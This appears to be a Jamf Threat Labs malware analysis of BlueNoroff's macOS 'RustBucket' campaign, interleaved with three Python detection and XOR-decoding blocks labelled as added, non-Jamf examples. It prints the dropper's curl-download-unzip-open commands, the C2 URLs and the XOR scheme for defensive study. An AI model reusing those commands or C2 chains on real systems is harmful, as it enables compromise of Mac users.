Effective URL: https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/

Jamf Blog

April 21, 2023 by Jamf Threat Labs


BLUENOROFF APT GROUP TARGETS MACOS WITH ‘RUSTBUCKET’ MALWARE

Jamf Threat Labs

Learn about the macOS malware variant discovered by Jamf Threat Labs named
'RustBucket'. What it does, how it works to compromise macOS devices, where it
comes from and what administrators can do to protect their Apple fleet.

By Ferdous Saljooki and Jaron Bradley

Jamf Threat Labs has discovered a macOS malware family that communicates with
command and control (C2) servers to download and execute various payloads. We
track and protect against this malware family under the name ‘RustBucket’ and
suspect it to be attributed to a North Korean, state-sponsored threat actor. The
APT group called BlueNoroff is thought to act as a sub-group to the well-known
Lazarus Group and is believed to be behind this attack. This attribution is due
to the similarities noted in a Kaspersky blog entry documenting an attack on the
Windows side. These similarities include malicious tooling on macOS that closely
aligns with the workflow and social engineering patterns of those employed in
the campaign.


STAGE-ONE

The stage-one malware (0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be) was discovered
while performing normal hunting routines for compiled AppleScript applications
that contained various suspicious commands. Among our results, we identified a
suspicious AppleScript file titled main.scpt contained within an unsigned
application named Internal PDF Viewer.app. It should be noted that we have no
reason to believe this application is allowed to execute without the user
manually overriding Gatekeeper.

The directory structure for the stage-one dropper is shown below. As with all
compiled AppleScript applications, the primary app code is within the main.scpt
file, located within the /Contents/Resources/Scripts/ directory.

tree Internal\ PDF\ Viewer.app/
Internal PDF Viewer.app/
└── Contents
    ├── Info.plist
    ├── MacOS
    │   └── applet
    ├── PkgInfo
    └── Resources
        ├── Scripts
        │   └── main.scpt
        ├── applet.icns
        ├── applet.rsrc
        └── description.rtfd
            └── TXT.rtf

Although the AppleScript was compiled, we were able to extract its contents by
loading it into the macOS Script Editor application. When launched, the dropper
executes the code seen below:

do shell script "curl -o /users/shared/1.zip hxxps://cloud.dnx.capital/ZyCws4dD_zE/aUhUJV0p6P/S9XrRH9%2B/R51g4b5Kjj/abnY%3D -A cur1"
do shell script "unzip -o -d /users/shared /users/shared/1.zip"
do shell script "open \"/users/shared/Internal PDF Viewer.app\""

The stage-one simply executes various do shell script commands to download the
stage-two from the C2 using curl. The malware writes and extracts the contents
of the zip file to the /Users/Shared/ directory and executes the stage-two
application also named Internal PDF Viewer.app. By breaking up the malware into
several components or stages, the malware author makes analysis more difficult,
especially if the C2 goes offline. This is a clever but common technique used by
malware authors to thwart analysis.

At the time of our analysis, both the stage-one and stage-two components of this
malware were undetected on VirusTotal.
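The post says stage-one was found by hunting compiled AppleScript applications for suspicious command combinations. The following is an added example of such a hunting heuristic, written for this page and not Jamf Threat Labs code: it scores the decompiled text of a main.scpt for the pattern quoted above (a `do shell script` that fetches with curl, unpacks with unzip into /Users/Shared and then `open`s another .app). The indicator names, regexes and review threshold are this example's own choices; the sample dropper text is constructed from the post's script with the real C2 URL replaced by a placeholder. On macOS the system tool `osadecompile` turns a compiled .scpt back into source text, which is what the `decompile` helper shells out to.

```python
"""Hunting heuristic for compiled-AppleScript droppers like RustBucket stage-one.

Added example, not Jamf Threat Labs code. It scores the *decompiled* text of a
main.scpt for the combination the post describes: `do shell script` lines that
fetch with curl, unpack with unzip into /Users/Shared and `open` another .app.
Indicator names, regexes and the review threshold are this example's own choices.
"""
import re
import subprocess
from dataclasses import dataclass, field
from pathlib import Path

# Each indicator is a regex over one decompiled AppleScript source (case-insensitive).
INDICATORS = {
    "do_shell_script": re.compile(r"do shell script", re.I),
    "curl_download": re.compile(r"\bcurl\b.*\s-o\s", re.I),
    "custom_user_agent": re.compile(r"\bcurl\b.*\s-A\s", re.I),
    "unzip_to_users_shared": re.compile(r"\bunzip\b.*/users/shared", re.I),
    "opens_app_bundle": re.compile(r"\bopen\b.*\.app\b", re.I),
}
REVIEW_THRESHOLD = 3  # indicators needed before an app is flagged for review


@dataclass
class HuntResult:
    path: str
    hits: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.hits)

    @property
    def flagged(self) -> bool:
        return self.score >= REVIEW_THRESHOLD


def score_applescript(source: str, path: str = "<inline>") -> HuntResult:
    """Match every indicator against the decompiled source text."""
    return HuntResult(path, [name for name, rx in INDICATORS.items() if rx.search(source)])


def decompile(scpt: Path) -> str:
    """macOS only: decompile a compiled .scpt via the system osadecompile tool."""
    return subprocess.run(["osadecompile", str(scpt)], check=True,
                          capture_output=True, text=True).stdout


def hunt(root: Path):
    """Walk app bundles under root; yield results that cross the threshold."""
    for scpt in root.rglob("Contents/Resources/Scripts/main.scpt"):
        result = score_applescript(decompile(scpt), str(scpt))
        if result.flagged:
            yield result


# Constructed sample: the stage-one logic quoted in the post, with the real C2
# URL replaced by a placeholder.
SAMPLE_DROPPER = (
    'do shell script "curl -o /users/shared/1.zip https://c2.example.invalid/x -A cur1"\n'
    'do shell script "unzip -o -d /users/shared /users/shared/1.zip"\n'
    'do shell script "open \\"/users/shared/Internal PDF Viewer.app\\""\n'
)
# Constructed benign sample: an applet that only shows a dialog.
SAMPLE_BENIGN = 'display dialog "Backup finished" buttons {"OK"}\n'

if __name__ == "__main__":
    for src in (SAMPLE_DROPPER, SAMPLE_BENIGN):
        r = score_applescript(src)
        print(r.flagged, r.score, r.hits)
```

Run `hunt(Path("/Applications"))` (or a quarantine directory) on a Mac to sweep real bundles; the scoring function is kept separate from the decompile step so it can be unit-tested, and tuned, off-box.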





STAGE-TWO

Although the stage-two (ca59874172660e6180af2815c3a42c85169aa0b2) application
name and icons look very similar to stage-one, the directory structures are
different and there is no use of AppleScript in the latter. The application
version, size and bundle identifier — com.apple.pdfViewer — are also notably
different, masquerading as a legitimate Apple bundle identifier. This
application is signed with an ad-hoc signature as well.



The application layout is that of a much more traditional app and is written in
Objective-C.

tree Internal\ PDF\ Viewer.app/
Internal PDF Viewer.app/
└── Contents
    ├── Info.plist
    ├── MacOS
    │   └── Internal PDF Viewer
    ├── PkgInfo
    ├── Resources
    │   ├── AppIcon.icns
    │   ├── Assets.car
    │   └── Base.lproj
    │       └── Main.storyboardc
    │           ├── Info.plist
    │           ├── MainMenu.nib
    │           │   ├── keyedobjects-101300.nib
    │           │   └── keyedobjects.nib
    │           ├── NSWindowController-B8D-0N-5wS.nib
    │           │   ├── keyedobjects-101300.nib
    │           │   └── keyedobjects.nib
    │           └── XfG-lQ-9wD-view-m2S-Jp-Qdl.nib
    │               ├── keyedobjects-101300.nib
    │               └── keyedobjects.nib
    └── _CodeSignature
        └── CodeResources

When the Internal PDF Viewer application is launched, the user is presented with
a PDF viewing application where they can select and open PDF documents. The
application, although basic, does actually operate as a functional PDF viewer,
a task that isn’t overly difficult using Apple’s well-built PDFKit framework.



Upon execution, the application does not perform any malicious actions yet. In
order for the malware to take the next step and communicate with the attacker,
the correct PDF must be loaded. We were able to track down a malicious PDF
(7e69cb4f9c37fad13de85e91b5a05a816d14f490) we believe to be tied to this
campaign, as it meets all the criteria in order to trigger malicious behaviors.

For example, when the malicious PDF is double-clicked from within Finder the
user will see the following:



This minimal message informs the user that they must open the PDF using the
necessary application in order to see the full details.

When opened within the malicious PDF viewer, the user will see a document (9
pages in total) that shows a venture capital firm that is interested in
investing in different tech startups. From what we can tell, the PDF was created
by taking the website of a small but legitimate venture capital firm and putting
it into PDF format.



It should be noted here that earlier, the stage-one dropper reached out to
cloud[.]dnx[.]capital, thus keeping on theme with the disguise of a venture
capital firm.

This PDF viewer technique used by the attacker is a clever one. At this point,
in order to perform analysis, not only do we need the stage-two malware but we
also require the correct PDF file that operates as a key in order to execute the
malicious code within the application.


SO, HOW IS THE MALWARE DISPLAYING A DIFFERENT PDF THAN THE ONE LOADED BY THE
USER?

To answer this, we take a closer look into some of the functions within the app.
Most notably, we see one titled viewPDF as part of the PEPWindow class. This
function seeks to a specific offset within the loaded PDF to check for a
specific blob of data. If the expected data is present, a function called
_encrypt_data is invoked, which, ironically, runs code to decrypt the blob and
produce a new PDF. It does this using a hardcoded 100-byte XOR key which can be
found in the __CONST data of the executable.



This newly decrypted PDF is then displayed to the user in the application,
providing the illusion that this app was truly necessary in order to view the
full details of the PDF.

Since the embedded PDF file is loaded directly into the viewer, it is never
written to the disk. Using a disassembler — such as Hopper — we can extract it
by placing a breakpoint on the return in the encrypt_data function.



If analyzing the ARM executable (as opposed to the Intel executable), we can
print the $x0 register which gives us all the bytes of the decrypted blob.
Saving these bytes into a file will also reveal the inner PDF file.




STAGE-TWO COMMUNICATION

So far we’ve decoded the PDF file that is embedded within the original PDF file,
but as we stated earlier, this is the point where the malware will also phone
home to the attacker. Much like the inner PDF document, the attacker’s C2 is
also XOR encoded within the original PDF. This is why we see the encrypt_data
function run a second time. The following bytes are passed to it which can be
found towards the bottom of the original PDF document.

41 18 95 ed a5 03 3c ef d1 f1 3d ba 6a 23 3d ef 0d 22 c0 32 79 c5 a3 f8 1c b6 95
b3 99 35 93 c5 c5 6f 9c a0 df 6a 36 53 99 56 ac d2 8e c0 a7 e6 dc 16 f0 ad cf 73
14 bd 55 f5 14 b6 5a f2 af 10 e9 c2 60 c9 c0 8b 69 f1 e2 79 38 09 0a de 3e 45 6e
7d 24 73 99 30 cc 77 a1 5e

This time when the encrypt_data function runs using the same hardcoded XOR key
as before, it returns the following:


hxxps://deck.31ventures.info/i5OvDE_RB/rUHSnl3rUu/V9Qj0zfRjl/hz2dhwQMGe/64uVA7PeqBYfe9gD/D

After the embedded PDF has been displayed to the user and the URL has been
de-obfuscated, the malware then calls a function titled _downAndExecute and
makes a POST request to a C2 server to presumably retrieve and execute a
stage-three payload.
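The reason encrypt_data can serve both to "encrypt" and to decrypt is that repeating-key XOR is its own inverse, and the same property lets an analyst recover key bytes from a known ciphertext/plaintext pair: key[i] = ciphertext[i] XOR plaintext[i]. The block below is an added example written for this page (not Jamf Threat Labs code) that implements the XOR routine and applies that recovery to the 90 bytes and the URL shown above. Its assumptions: the key is applied from offset 0 without any skew, the key is 100 bytes as the post states (so this single pair determines only 90 of them), and the real plaintext begins with "https://" where the post defangs it to "hxxps://". The recovered bytes are only as reliable as the transcription on the page.

```python
"""Repeating-key XOR as used by RustBucket's encrypt_data, plus known-plaintext
key recovery. Added example, not Jamf Threat Labs code.

Assumptions: key applied from offset 0, 100-byte key (per the post), and the
decoded URL really starts with "https://" (the post prints it defanged).
"""
from itertools import cycle

# Ciphertext bytes exactly as printed in the post (90 bytes).
C2_BLOB = bytes.fromhex(
    "41 18 95 ed a5 03 3c ef d1 f1 3d ba 6a 23 3d ef 0d 22 c0 32 79 c5 a3 f8 1c b6 95 "
    "b3 99 35 93 c5 c5 6f 9c a0 df 6a 36 53 99 56 ac d2 8e c0 a7 e6 dc 16 f0 ad cf 73 "
    "14 bd 55 f5 14 b6 5a f2 af 10 e9 c2 60 c9 c0 8b 69 f1 e2 79 38 09 0a de 3e 45 6e "
    "7d 24 73 99 30 cc 77 a1 5e"
)
# The URL the post says those bytes decode to, refanged (assumption: hxxps -> https).
C2_URL = b"https://deck.31ventures.info/i5OvDE_RB/rUHSnl3rUu/V9Qj0zfRjl/hz2dhwQMGe/64uVA7PeqBYfe9gD/D"
KEY_LEN = 100  # length of the hardcoded key, per the post


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """The encrypt_data operation: byte-wise XOR with a cycling key.
    Because XOR is an involution, this both encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(ciphertext: bytes, plaintext: bytes, key_len: int) -> bytes:
    """Known-plaintext recovery of the first min(len, key_len) key bytes.
    Only the bytes the pair actually determines are returned."""
    if len(ciphertext) != len(plaintext):
        raise ValueError("ciphertext and plaintext lengths differ")
    n = min(len(ciphertext), key_len)
    key = bytearray(ciphertext[i] ^ plaintext[i] for i in range(n))
    # With a repeating key, any bytes past key_len must agree with the first
    # cycle; a mismatch means the offset-0 / exact-plaintext assumption is wrong.
    for i in range(key_len, len(ciphertext)):
        if (ciphertext[i] ^ plaintext[i]) != key[i % key_len]:
            raise ValueError(f"inconsistent key byte at offset {i}")
    return bytes(key)


def recovered_key_bytes() -> bytes:
    """Key material determined by the post's ciphertext/URL pair (90 of 100 bytes)."""
    return recover_key(C2_BLOB, C2_URL, KEY_LEN)


if __name__ == "__main__":
    key = recovered_key_bytes()
    print(f"recovered {len(key)} of {KEY_LEN} key bytes: {key.hex()}")
    print(xor_with_key(C2_BLOB, key).decode())
```

The 90 recovered bytes are enough to decode any blob the malware XORs from offset 0 that is at most 90 bytes long; decoding the embedded PDF (longer than one key cycle) needs the remaining 10 bytes, which come from the binary's __CONST data as the post describes rather than from this pair.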



In the _downAndExecute function shown below, we can see the various parameters
being set in order to initiate an HTTP request.



The malware also creates a new thread and sleeps before making the POST request
again in a loop until an HTTP 200 response is returned.

Unfortunately, at the time of our analysis, the server was not responding with
the necessary message.



We have however managed to discover a new URL on the same domain that is hosting
a Mach-O executable that we believe to be the new location of the final payload.

hxxps://deck[.]31ventures[.]info/QKUh2zHgeC4/cvlw4kykmB/KANCcmwLIz/wYBfGR5XFn/_E=

If the stage-two dropper succeeds in downloading the stage-three payload, we can
view the next actions within the downAndExecute_block_invoke.



The aforementioned image shows the following steps taking place if the C2
responds:

 1. The malware creates a temporary directory and writes the received file to
    that temporary directory. The name of that malicious file will be the
    current mach timestamp (the number of seconds since midnight January 1st,
    2001). An example file path would look like this:
    /var/folders/g6/w3s4hg8n57sgfjl4xgrhjs_w0000gn/T/703517604263
 2. Executable permissions are assigned to the new file.
 3. The program arguments are set and the file is executed. The set argument is
    that of the attacker C2 decoded from this stage-two payload. The stage-three
    will go on to use this value.
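The three steps above describe a hand-off that is visible in process-execution telemetry: a file with a purely numeric name executed from a per-user temp directory, given the C2 URL as its one argument, by a process that calls itself a PDF viewer. The following is an added detection example written for this page (not Jamf Threat Labs or Jamf Protect code) that scores such events. The events are constructed dicts standing in for whatever an EDR or Endpoint Security pipeline emits; the temp path is the one quoted in the post, the URL is a placeholder, and the field names, regexes, alert threshold and the reading of the leading nine digits of the filename as whole seconds since 2001 are this example's own assumptions.

```python
"""Detection for the stage-three hand-off described in the steps above.

Added example, not Jamf Threat Labs or Jamf Protect code. Field names, regexes
and the threshold are this example's own choices; the "seconds since 2001"
reading of the filename follows the post and is only used to give the analyst
a human-readable time, not as a gate.
"""
import re
from datetime import datetime, timedelta, timezone

CF_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)  # CFAbsoluteTime epoch

# macOS per-user temp dirs live under /var/folders/<2 chars>/<hash>/T/
TEMP_NUMERIC_EXEC = re.compile(r"^/(?:private/)?var/folders/[^/]+/[^/]+/T/(\d{9,})$")
URL_ARG = re.compile(r"^https?://", re.I)
ALERT_THRESHOLD = 3


def cf_seconds_to_datetime(seconds: int) -> datetime:
    """Convert whole seconds since 2001-01-01 UTC to a datetime."""
    return CF_EPOCH + timedelta(seconds=seconds)


def score_exec_event(ev: dict) -> dict:
    """Return the matched reasons for one exec event plus an alert decision."""
    reasons = []
    m = TEMP_NUMERIC_EXEC.match(ev.get("path", ""))
    if m:
        reasons.append("numeric-named executable in per-user temp dir")
    args = ev.get("args", [])
    if len(args) == 2 and URL_ARG.match(args[1]):
        reasons.append("single URL argument (C2 handed down from stage-two)")
    if "pdf viewer" in ev.get("parent_name", "").lower():
        reasons.append("parent process names itself a PDF viewer")
    if ev.get("signing") == "adhoc":
        reasons.append("ad-hoc signed binary")
    # Assumption: the first 9 digits are whole seconds; the post's 12-digit
    # example is consistent with fractional digits being appended.
    when = cf_seconds_to_datetime(int(m.group(1)[:9])).isoformat() if m else None
    return {"alert": len(reasons) >= ALERT_THRESHOLD, "reasons": reasons,
            "name_as_time": when, "path": ev.get("path")}


def run_detection(events) -> list:
    """Evaluate a batch of events and return only those that alert."""
    return [r for r in (score_exec_event(e) for e in events) if r["alert"]]


# Constructed events: the first mirrors the post's description (temp path is
# the one quoted there, URL is a placeholder); the second is ordinary activity.
SAMPLE_EVENTS = [
    {"path": "/var/folders/g6/w3s4hg8n57sgfjl4xgrhjs_w0000gn/T/703517604263",
     "args": ["/var/folders/g6/w3s4hg8n57sgfjl4xgrhjs_w0000gn/T/703517604263",
              "https://c2.example.invalid/path"],
     "parent_name": "Internal PDF Viewer", "signing": "adhoc"},
    {"path": "/usr/bin/curl",
     "args": ["/usr/bin/curl", "https://updates.example.invalid/feed"],
     "parent_name": "Terminal", "signing": "apple"},
]

if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS):
        print(hit)
```

Requiring three of the four signals keeps a lone numeric temp file (common for installers) or a lone URL argument (every curl invocation) from alerting on its own, while the combination the post describes still trips it even if the signing field is missing from the telemetry.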


STAGE-THREE

The stage-three payload (182760cbe11fa0316abfb8b7b00b63f83159f5aa) is an ad-hoc
signed trojan written in Rust and weighing in at a sizable 11.2MB. It’s a
universal binary that holds both ARM and x86 architectures. Upon initial
execution, it performs a handful of system recon commands.

One of the earliest used modules is titled webT::getinfo. Within this module is
the ability to look at the basic info about the system, process listing, current
time and whether or not it’s running within a VM. The functions are named
accordingly.



Running this malware results in communication to the URL provided as the first
argument passed at execution time. The WebT::send_request function is
responsible for sending the initial message to the C2 server. When placing a
breakpoint on it, we can step over it resulting in a call to the server.



This payload allows the attacker to carry out further objectives on the system,
but perhaps a deep dive on stage-three is best saved for another blog post.


AT A HIGH LEVEL

We dove fairly deeply into some of the different actions of this malware. At a
higher level, the workflow looks like the following:




CONNECTIONS TO BLUENOROFF

There are a few signs that this malware is tied to BlueNoroff. First and
foremost is the domain used in the stage-one dropper: cloud[.]dnx[.]capital.
This domain was reported as being used by the attackers in a writeup done by
Proofpoint. In the previously mentioned Kaspersky blog, it was reported that the
attackers had created numerous fake domains impersonating venture capital firms
and banks in a campaign Kaspersky titled ‘SnatchCrypto’. This aligns with the
social engineering schemes discovered in the PDF document. The Windows malware
also used the “decoy document” approach which clearly worked well for the
attacker. The earliest submission of the “Internal PDF Viewer” we could find on
VirusTotal was uploaded in January 2023 and we’ve observed the attackers
continuing to host it.

While many different PDF payloads exist that work on Windows, so far only one
PDF has been discovered that will result in a call to the attacker on macOS. We
do suspect more than just this one PDF exists. It’s worth noting that the XOR
key found within the malware can also be found within a variety of malicious PDF
files. However, when loaded into the Viewer application, these files do not
result in a properly decoded URL. We suspect a different variant of the
malicious viewer (or perhaps a different platform) is capable of loading the XOR
key from within the PDF instead of the attackers hardcoding it in the malicious
app.


CONCLUSION

The malware used here shows that as macOS grows in market share, attackers
realize that a number of victims will be immune if their tooling is not updated
to include the Apple ecosystem. Lazarus group, which has strong ties to
BlueNoroff, has a long history of attacking macOS and it’s likely we’ll see more
APT groups start doing the same.

Jamf Protect defends against the malicious components of this malware and blocks
the malicious domains. Jamf Threat Labs will continue to monitor BlueNoroff’s
activity on this campaign.



A shout out to Patrick Wardle for his collaboration on some of the analysis
here. If you’re looking to learn more about the analysis of macOS malware, check
out the free online book: The Art of Mac Malware.


INDICATORS OF COMPROMISE

domains:
cloud[.]dnx[.]capital - (Called from the Stage-one payload)
deck[.]31ventures[.]info - (Called from the Stage-two and Stage-three payloads)

Stage-One:
dabb4372050264f389b8adcf239366860662ac52 - main.scpt
0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be - Internal PDF Viewer.zip

Stage-Two:
e0e42ac374443500c236721341612865cd3d1eec - Internal PDF Viewer Universal Binary
ac08406818bbf4fe24ea04bfd72f747c89174bdb - Internal PDF Viewer x86 Binary
72167ec09d62cdfb04698c3f96a6131dceb24a9c - Internal PDF Viewer Arm Binary
fd1cef5abe3e0c275671916a1f3a566f13489416 - Internal PDF Viewer x86 Binary

ca59874172660e6180af2815c3a42c85169aa0b2 - Internal PDF Viewer.app.zip
d9f1392fb7ed010a0ecc4f819782c179efde9687 - PDF Viewer JIC Internal.zip
9121509d674091ce1f5f30e9a372b5dcf9bcd257 - Internal PDF Viewer.app.zip
a1a85cba1bc4ac9f6eafc548b1454f57b4dff7e0 - Internal PDF Viewer.app.zip
7a5d57c7e2b0c8ab7d60f7a7c7f4649f33fea8aa - Pdf Viewer.zip

Stage-Three:
182760cbe11fa0316abfb8b7b00b63f83159f5aa - Rust trojan

Malicious PDFs:
7e69cb4f9c37fad13de85e91b5a05a816d14f490 - InvestmentStrategy(Protected).pdf
be234cb6819039d6a1d3b1a205b9f74b6935bbcc - DOJ Report on Bizlato Investigation_asistant.pdf)
469236d0054a270e117a2621f70f2a494e7fb823 - DOJ Report on Bizlato Investigation.pdf
e7158bb75adf27262ec3b0f2ca73c802a6222379 - Daiwa Ventures.pdf

Malicious File Paths:
/Users/Shared/Internal PDF Viewer.app


REFERENCES:

https://securelist.com/bluenoroff-methods-bypass-motw/108383/
https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds


Jamf Threat Labs is a global team of experienced threat researchers,
cybersecurity experts and data scientists with skills that span penetration
testing, network monitoring, malware research and app risk assessment. Jamf
Threat Labs primarily monitors and explores emerging threats affecting Mac and
mobile devices. The team’s research is published with the aim of raising
awareness of specific threats while also improving awareness and advocacy of
security practices to protect the modern workforce.